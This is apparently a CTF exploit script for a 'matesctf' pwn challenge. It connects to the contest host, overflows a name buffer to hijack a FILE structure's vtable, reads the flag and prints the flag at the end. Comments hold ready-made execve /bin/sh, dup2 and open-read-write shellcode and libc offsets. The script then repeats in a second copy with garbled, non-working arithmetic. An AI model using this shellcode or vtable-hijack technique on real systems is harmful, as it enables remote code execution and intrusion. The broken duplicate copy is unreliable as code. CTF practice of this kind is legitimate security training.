Mipu94/matectf5-readwrite.py

## matectf5-readwrite.py
import sys
sys.path.append("/home/athos/ctf/form")
from customlibpwn import *
global s

#def write_got(system,got_addr,n):
#def virtual_chunk(save_addr,bit=32)
#64bit fmt stack/bit + 6
#open-read-write flag 32bit: hflag[H1\xf6VSH\x89\xe7j\x02X\x0f\x05P_U^jAZH1\xc0\x0f\x05H1\xc0H1\xffH\xff\xc7H\xff\xc0\x0f\x05
#32 system=0x468f0	; binsh=0x17dbc5
#64 system=0x46640	; binsh=0x17ccdb
#binsh64="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
#binsh="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
#sys_dup="\x31\xc9\x6a\x04\x5b\x6a\x3f\x58\xcd\x80\xfe\xc1\x80\xf9\x03\x75\xf4"
#######################################################
#					DEBUG PEDA
#######################################################
struct="""
"""
f=open("peda-debug","w")
f.write(struct)
f.close()

debug="""
bp *0x123
"""
filename=""
f=open("peda-cmd","w")
f.write(debug)
f.close()

def p(m):
        return pack("<I", m)

def u(m):
        return unpack("<I", m)[0]
########################################################
#			PWN! PWN! PWN!
########################################################

def doexploit():
	#s=sock("localhost",4000)
	s=sock("lab01.matesctf.org",12345)
	recvu("Your choice :")
	send("1\n")
	ret = 0x80489A6
	filename = "flag\x00" + p(ret)
	recvu("What do you want to see :")
	send(filename+"\n")
	recvu("Your choice :")
	send("2\n")
	recvu("Your choice :")
	send("5\n")
	recvu("Leave your name :")
	pfilename = (0x804B080 +5)
	pret1 = pfilename -8
	pret2 = pfilename -8
	pfile = 0x804B260 #pname
	print "pfile: ", 0x804B260

	pvtable =  pfile + 4*20 #0x804b2a8
	print "pvtable: ",pvtable

	pvclose = pvtable + 4*17
	name = p(0x8000)+"\x00"*(0x20-4) + p(pfile) # overwrite file pointer
	name = name + (4*18-len(name))*"\x00" + p(pvtable) #overwrite vtable
										  #*vtable

	name = name + (4*20-len(name))*"\x00" + p(pret2)*18 #overwrite close in vtable
	send(name+"\n")
	telnet()
	s.close()

doexploit()

#flag: matesctf{1_d0nt_w4nt_y0u_t0_s33_my_f1l3}
	import sys
	sys.path.append("/home/athos/ctf/form")
	from customlibpwn import *
	global s

	#def write_got(system,got_addr,n):
	#def virtual_chunk(save_addr,bit=32)
	#64bit fmt stack/bit + 6
	#open-read-write flag 32bit: hflag[H1\xf6VSH\x89\xe7j\x02X\x0f\x05P_U^jAZH1\xc0\x0f\x05H1\xc0H1\xffH\xff\xc7H\xff\xc0\x0f\x05
	#32 system=0x468f0 ; binsh=0x17dbc5
	#64 system=0x46640 ; binsh=0x17ccdb
	#binsh64="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
	#binsh="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
	#sys_dup="\x31\xc9\x6a\x04\x5b\x6a\x3f\x58\xcd\x80\xfe\xc1\x80\xf9\x03\x75\xf4"
	#######################################################
	# DEBUG PEDA
	#######################################################
	struct="""
	"""
	f=open("peda-debug","w")
	f.write(struct)
	f.close()

	debug="""
	bp *0x123
	"""
	filename=""
	f=open("peda-cmd","w")
	f.write(debug)
	f.close()

	def p(m):
	return pack("<I", m)

	def u(m):
	return unpack("<I", m)[0]
	########################################################
	# PWN! PWN! PWN!
	########################################################

	def doexploit():
	#s=sock("localhost",4000)
	s=sock("lab01.matesctf.org",12345)
	recvu("Your choice :")
	send("1\n")
	ret = 0x80489A6
	filename = "flag\x00" + p(ret)
	recvu("What do you want to see :")
	send(filename+"\n")
	recvu("Your choice :")
	send("2\n")
	recvu("Your choice :")
	send("5\n")
	recvu("Leave your name :")
	pfilename = (0x804B080 +5)
	pret1 = pfilename -8
	pret2 = pfilename -8
	pfile = 0x804B260 #pname
	print "pfile: ", 0x804B260

	pvtable = pfile + 4*20 #0x804b2a8
	print "pvtable: ",pvtable

	pvclose = pvtable + 4*17
	name = p(0x8000)+"\x00"*(0x20-4) + p(pfile) # overwrite file pointer
	name = name + (418-len(name))"\x00" + p(pvtable) #overwrite vtable
	#*vtable

	name = name + (420-len(name))"\x00" + p(pret2)*18 #overwrite close in vtable
	send(name+"\n")
	telnet()
	s.close()

	doexploit()

	#flag: matesctf{1_d0nt_w4nt_y0u_t0_s33_my_f1l3}